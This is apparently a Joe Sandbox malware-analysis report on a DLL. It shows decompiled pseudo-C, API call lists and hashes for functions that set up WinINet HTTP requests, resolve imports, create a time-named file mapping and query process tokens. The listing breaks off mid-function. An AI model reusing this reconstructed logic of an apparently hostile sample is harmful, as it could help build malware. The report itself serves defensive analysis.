                    0x010c55c4
                    0x010c55c6
                    0x010c55cb
                    0x010c55cc
                    0x00000000
                    0x010c55a7
                    0x010c55a7
                    0x010c55ad
                    0x00000000
                    0x010c55af
                    0x010c55af
                    0x010c55b4
                    0x010c55b6
                    0x010c55bb
                    0x010c55bc
                    0x010c55d2
                    0x010c55d2
                    0x010c55da
                    0x010c55e8
                    0x010c55ec
                    0x010c55f8
                    0x010c55fa
                    0x010c55fc
                    0x010c5600
                    0x00000000
                    0x010c5606
                    0x00000000
                    0x010c5606
                    0x010c5600
                    0x010c55ad
                    0x00000000
                    0x010c55a5
                    0x010c5573
                    0x010c5575
                    0x010c5579
                    0x010c557a
                    0x010c557a
                    0x010c557e
                    0x010c5588
                    0x010c5588
                    0x010c558e
                    0x010c5591
                    0x010c5591
                    0x010c5598
                    0x010c5598
                    0x010c561f
                    0x00000000

                    APIs
                    • memset.NTDLL ref: 010C5472
                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 010C547E
                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 010C54A6
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 010C54C6
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,010C66F1,?), ref: 010C54E1
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,010C66F1,?,00000000), ref: 010C5588
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010C66F1,?,00000000,?,?), ref: 010C5598
                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 010C55D2
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 010C55EC
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010C55F8
                      • Part of subcall function 010C3399: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,037A93D8,00000000,?,74E5F710,00000000,74E5F730), ref: 010C33E8
                      • Part of subcall function 010C3399: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,037A9410,?,00000000,30314549,00000014,004F0053,037A93CC), ref: 010C3485
                      • Part of subcall function 010C3399: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010C54F9), ref: 010C3497
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010C66F1,?,00000000,?,?), ref: 010C560B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                    • String ID: Ut
                    • API String ID: 3521023985-8415677
                    • Opcode ID: 82fa6b22080f6bdc939999444818bf4447ff3d239517fbc4a832a28c2c83c842
                    • Instruction ID: 93aff575e08a7fec9618e3702bdc810d514135265f9ff2accb7a7f2af7f405f7
                    • Opcode Fuzzy Hash: 82fa6b22080f6bdc939999444818bf4447ff3d239517fbc4a832a28c2c83c842
                    • Instruction Fuzzy Hash: 58518B75608325AFD7209F199C449AFBBE9EB88B64F108A1EF8E4C2190D775D540CFA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C7A34 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E010C7A34(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E010C63FD(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E010C17AB(_t56);
					} else {
						E010C17AB( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E010C79C9) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E010C5867( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x10ca320; // 0x26dd5a8
						_t15 = _t59 + 0x10cb743; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65);
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                    0x010c7a34
                    0x010c7a34
                    0x010c7a3f
                    0x010c7a46
                    0x010c7a4e
                    0x010c7a58
                    0x010c7a5e
                    0x010c7a71
                    0x010c7a81
                    0x010c7a73
                    0x010c7a76
                    0x010c7a7b
                    0x010c7a7b
                    0x010c7a71
                    0x010c7a91
                    0x010c7a99
                    0x010c7a9c
                    0x010c7b85
                    0x00000000
                    0x010c7ab7
                    0x010c7aba
                    0x010c7acd
                    0x010c7ad5
                    0x010c7ad8
                    0x010c7b00
                    0x010c7b13
                    0x010c7b1d
                    0x010c7b20
                    0x010c7b28
                    0x010c7b2b
                    0x00000000
                    0x00000000
                    0x010c7b2f
                    0x010c7b3b
                    0x010c7b4c
                    0x010c7b4e
                    0x010c7b5f
                    0x010c7b5f
                    0x010c7b6f
                    0x00000000
                    0x010c7b81
                    0x00000000
                    0x010c7b81
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c7ad8

                    APIs
                    • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 010C7A46
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 010C7A69
                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 010C7A91
                    • InternetSetStatusCallback.WININET(00000000,010C79C9), ref: 010C7AA8
                    • ResetEvent.KERNEL32(?), ref: 010C7ABA
                    • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 010C7ACD
                    • GetLastError.KERNEL32 ref: 010C7ADA
                    • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 010C7B20
                    • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 010C7B3E
                    • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 010C7B5F
                    • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 010C7B6B
                    • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 010C7B7B
                    • GetLastError.KERNEL32 ref: 010C7B85
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                    • String ID:
                    • API String ID: 2290446683-0
                    • Opcode ID: 1c4bd35a5e8c21c46c334a569eec0e18482ce0930a3339f27f08900e35f8098d
                    • Instruction ID: e2f1efb3752f1423db3bf26749231e34cf5e6fecf32676f8d8457b53a63a17fa
                    • Opcode Fuzzy Hash: 1c4bd35a5e8c21c46c334a569eec0e18482ce0930a3339f27f08900e35f8098d
                    • Instruction Fuzzy Hash: E1414D71600204BFE7319FA9DC48E9F7ABDEF84B44B10496DF682D2191E775A544CF21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C7E75 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 189 10c7e75-10c7eda 190 10c7edc-10c7ef6 RaiseException 189->190 191 10c7efb-10c7f25 189->191 192 10c80ab-10c80af 190->192 193 10c7f2a-10c7f36 191->193 194 10c7f27 191->194 195 10c7f38-10c7f43 193->195 196 10c7f49-10c7f4b 193->196 194->193 195->196 204 10c808e-10c8095 195->204 197 10c7f51-10c7f58 196->197 198 10c7ff3-10c7ffd 196->198 202 10c7f68-10c7f75 LoadLibraryA 197->202 203 10c7f5a-10c7f66 197->203 200 10c7fff-10c8007 198->200 201 10c8009-10c800b 198->201 200->201 205 10c800d-10c8010 201->205 206 10c8089-10c808c 201->206 207 10c7fb8-10c7fc4 InterlockedExchange 202->207 208 10c7f77-10c7f87 GetLastError 202->208 203->202 203->207 210 10c80a9 204->210 211 10c8097-10c80a4 204->211 213 10c803e-10c804c GetProcAddress 205->213 214 10c8012-10c8015 205->214 206->204 217 10c7fec-10c7fed FreeLibrary 207->217 218 10c7fc6-10c7fca 207->218 215 10c7f89-10c7f95 208->215 216 10c7f97-10c7fb3 RaiseException 208->216 210->192 211->210 213->206 220 10c804e-10c805e GetLastError 213->220 214->213 219 10c8017-10c8022 214->219 215->207 215->216 216->192 217->198 218->198 221 10c7fcc-10c7fd8 LocalAlloc 218->221 219->213 223 10c8024-10c802a 219->223 225 10c806a-10c806c 220->225 226 10c8060-10c8068 220->226 221->198 222 10c7fda-10c7fea 221->222 222->198 223->213 228 10c802c-10c802f 223->228 225->206 227 10c806e-10c8086 RaiseException 225->227 226->225 227->206 228->213 230 10c8031-10c803c 228->230 230->206 230->213
                    C-Code - Quality: 51%
                    			E010C7E75(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x10c0000;
				_t115 = _t139[3] + 0x10c0000;
				_t131 = _t139[4] + 0x10c0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x10c0000;
				_v16 = _t139[5] + 0x10c0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x10c0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x10ca1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x10ca1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x10ca1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x10ca1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x10ca1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x10ca1b8; // 0x0
										 *_t102 = _t125;
										 *0x10ca1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x10ca1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                    0x010c7e84
                    0x010c7e9a
                    0x010c7ea0
                    0x010c7ea2
                    0x010c7ea7
                    0x010c7ead
                    0x010c7eb2
                    0x010c7eb5
                    0x010c7ec3
                    0x010c7eca
                    0x010c7ecd
                    0x010c7ed0
                    0x010c7ed1
                    0x010c7ed4
                    0x010c7ed7
                    0x010c7eda
                    0x010c7edf
                    0x010c7eee
                    0x00000000
                    0x010c7ef4
                    0x010c7efe
                    0x010c7f08
                    0x010c7f0d
                    0x010c7f0f
                    0x010c7f19
                    0x010c7f1c
                    0x010c7f1f
                    0x010c7f25
                    0x010c7f27
                    0x010c7f27
                    0x010c7f2a
                    0x010c7f2d
                    0x010c7f32
                    0x010c7f36
                    0x010c7f49
                    0x010c7f4b
                    0x010c7ff3
                    0x010c7ff3
                    0x010c7ffa
                    0x010c7ffd
                    0x010c8007
                    0x010c8007
                    0x010c800b
                    0x010c8089
                    0x010c808c
                    0x010c808e
                    0x010c808e
                    0x010c8095
                    0x010c8097
                    0x010c80a1
                    0x010c80a4
                    0x010c80a7
                    0x010c80a7
                    0x00000000
                    0x010c800d
                    0x010c8010
                    0x010c803e
                    0x010c8048
                    0x010c804c
                    0x010c8054
                    0x010c8057
                    0x010c805e
                    0x010c8068
                    0x010c8068
                    0x010c806c
                    0x010c8071
                    0x010c8080
                    0x010c8086
                    0x010c8086
                    0x010c806c
                    0x00000000
                    0x010c8017
                    0x010c801a
                    0x010c8022
                    0x010c8037
                    0x010c803c
                    0x00000000
                    0x00000000
                    0x010c803c
                    0x00000000
                    0x010c8022
                    0x010c8010
                    0x010c800b
                    0x010c7f51
                    0x010c7f58
                    0x010c7f68
                    0x010c7f6b
                    0x010c7f71
                    0x010c7f75
                    0x010c7fb8
                    0x010c7fc4
                    0x010c7fed
                    0x010c7fc6
                    0x010c7fca
                    0x010c7fd0
                    0x010c7fd8
                    0x010c7fda
                    0x010c7fdd
                    0x010c7fe3
                    0x010c7fe5
                    0x010c7fe5
                    0x010c7fd8
                    0x010c7fca
                    0x00000000
                    0x010c7fc4
                    0x010c7f7d
                    0x010c7f80
                    0x010c7f87
                    0x010c7f97
                    0x010c7f9a
                    0x010c7faa
                    0x00000000
                    0x010c7fb0
                    0x010c7f91
                    0x010c7f95
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c7f95
                    0x010c7f62
                    0x010c7f66
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c7f66
                    0x010c7f3f
                    0x010c7f43
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 010C7EEE
                    • LoadLibraryA.KERNEL32(?), ref: 010C7F6B
                    • GetLastError.KERNEL32 ref: 010C7F77
                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 010C7FAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                    • String ID: $
                    • API String ID: 948315288-3993045852
                    • Opcode ID: 625b086f8f24ddc0386b678b67d08a5f49e04887c7965aab7acc0e8878157956
                    • Instruction ID: a9c020ce6611a77a71e36bc733f3c118b92cc4b1324b40c5a37b695c5bf774a7
                    • Opcode Fuzzy Hash: 625b086f8f24ddc0386b678b67d08a5f49e04887c7965aab7acc0e8878157956
                    • Instruction Fuzzy Hash: E3813B71A00209DFDB61CFA8D880AADB7F5BB48750F24806EFA85D7240EB75E941CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C414A Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 74%
                    			E010C414A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L010C8184();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x10ca320; // 0x26dd5a8
				_t5 = _t13 + 0x10cb87e; // 0x37a8e26
				_t6 = _t13 + 0x10cb59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L010C7DEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x10ca34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                    0x010c414a
                    0x010c4152
                    0x010c4156
                    0x010c415c
                    0x010c4161
                    0x010c4166
                    0x010c4169
                    0x010c416c
                    0x010c4171
                    0x010c4172
                    0x010c4175
                    0x010c417a
                    0x010c4181
                    0x010c418b
                    0x010c418d
                    0x010c418e
                    0x010c4191
                    0x010c41ad
                    0x010c41b3
                    0x010c41b7
                    0x010c4205
                    0x010c41b9
                    0x010c41c6
                    0x010c41d6
                    0x010c41de
                    0x010c41f0
                    0x010c41f4
                    0x00000000
                    0x00000000
                    0x010c41e0
                    0x010c41e3
                    0x010c41e8
                    0x010c41ea
                    0x010c41ea
                    0x010c41c8
                    0x010c41ca
                    0x010c41f6
                    0x010c41f7
                    0x010c41f7
                    0x010c41c6
                    0x010c420c

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,010C65C3,?,?,4D283A53,?,?), ref: 010C4156
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010C416C
                    • _snwprintf.NTDLL ref: 010C4191
                    • CreateFileMappingW.KERNELBASE(000000FF,010CA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 010C41AD
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,010C65C3,?,?,4D283A53,?), ref: 010C41BF
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 010C41D6
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,010C65C3,?,?,4D283A53), ref: 010C41F7
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,010C65C3,?,?,4D283A53,?), ref: 010C41FF
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID:
                    • API String ID: 1814172918-0
                    • Opcode ID: 25d866b7e17e6b9cbf1278c7b710c2ce78648fde4855e0ca865a9b7b5c99877f
                    • Instruction ID: 1459a541475855ed2e59e080356bb94162638355a589677484bbcae02aa53deb
                    • Opcode Fuzzy Hash: 25d866b7e17e6b9cbf1278c7b710c2ce78648fde4855e0ca865a9b7b5c99877f
                    • Instruction Fuzzy Hash: D021A272A00204BFD721AF68CC16FDE3BF9BB88B54F254169FA85E7180DA759505CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C5622 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 93%
                    			E010C5622(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E010C5867(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E010C17AB(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E010C17AB(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E010C17AB(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E010C17AB(_t46);
				}
				return _t24;
			}












                    0x010c5622
                    0x010c5622
                    0x010c5624
                    0x010c5626
                    0x010c562d
                    0x010c5634
                    0x010c5634
                    0x010c5639
                    0x010c563e
                    0x010c5645
                    0x010c564c
                    0x010c5650
                    0x010c5655
                    0x010c5655
                    0x010c5657
                    0x010c565c
                    0x010c5660
                    0x010c5665
                    0x010c5665
                    0x010c5667
                    0x010c566c
                    0x010c5670
                    0x010c5675
                    0x010c5675
                    0x010c5677
                    0x010c5682
                    0x010c5685
                    0x010c5685
                    0x010c5687
                    0x010c568c
                    0x010c568f
                    0x010c568f
                    0x010c5691
                    0x010c5698
                    0x010c569b
                    0x010c56a0
                    0x010c56a3
                    0x010c56a3
                    0x010c56a6
                    0x010c56ab
                    0x010c56ae
                    0x010c56ae
                    0x010c56b3
                    0x010c56b7
                    0x010c56ba
                    0x010c56ba
                    0x010c56bf
                    0x010c56c4
                    0x00000000
                    0x010c56c7
                    0x010c56ce

                    APIs
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 010C5650
                    • InternetCloseHandle.WININET(?), ref: 010C5655
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 010C5660
                    • InternetCloseHandle.WININET(?), ref: 010C5665
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 010C5670
                    • InternetCloseHandle.WININET(?), ref: 010C5675
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,010C1B44,?,?,00000000,00000000,74E481D0), ref: 010C5685
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,010C1B44,?,?,00000000,00000000,74E481D0), ref: 010C568F
                      • Part of subcall function 010C5867: WaitForMultipleObjects.KERNEL32(00000002,010C7AF8,00000000,010C7AF8,?,?,?,010C7AF8,0000EA60), ref: 010C5882
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                    • String ID:
                    • API String ID: 2824497044-0
                    • Opcode ID: 88e16c4d23126a59927ac5e5ed186176d9165701f2adceb33a9679e5316dc0de
                    • Instruction ID: ed3dd342fcc1d89641953824a0f1a24f764b41ab5f1be047718b1a8102401c02
                    • Opcode Fuzzy Hash: 88e16c4d23126a59927ac5e5ed186176d9165701f2adceb33a9679e5316dc0de
                    • Instruction Fuzzy Hash: 2E11173AB00648ABD670AFAAEC84C1FBBF9AF98A403550D5CE1C6D3510C735F8448E64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C13CF Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E010C13CF(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x10ca2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E010C63FD(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
